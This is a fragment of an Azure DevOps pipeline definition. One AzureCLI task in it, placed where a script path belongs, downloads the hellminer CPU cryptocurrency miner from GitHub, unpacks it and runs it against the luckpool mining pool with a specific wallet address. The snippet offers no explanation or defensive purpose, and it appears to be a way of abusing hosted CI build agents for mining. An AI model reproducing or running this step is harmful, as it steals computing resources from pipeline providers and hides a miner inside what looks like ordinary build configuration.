- task: AzureCLI@2
  inputs:
    scriptType: 'bash'
    scriptLocation: 'scriptPath'
    scriptPath: 
wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar xf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u REVcPRuYZM5MpK5oyBXCL8dwWzc55cp8Vn.40coro3 -p d=4096S,xn=1,hybrid --cpu 30
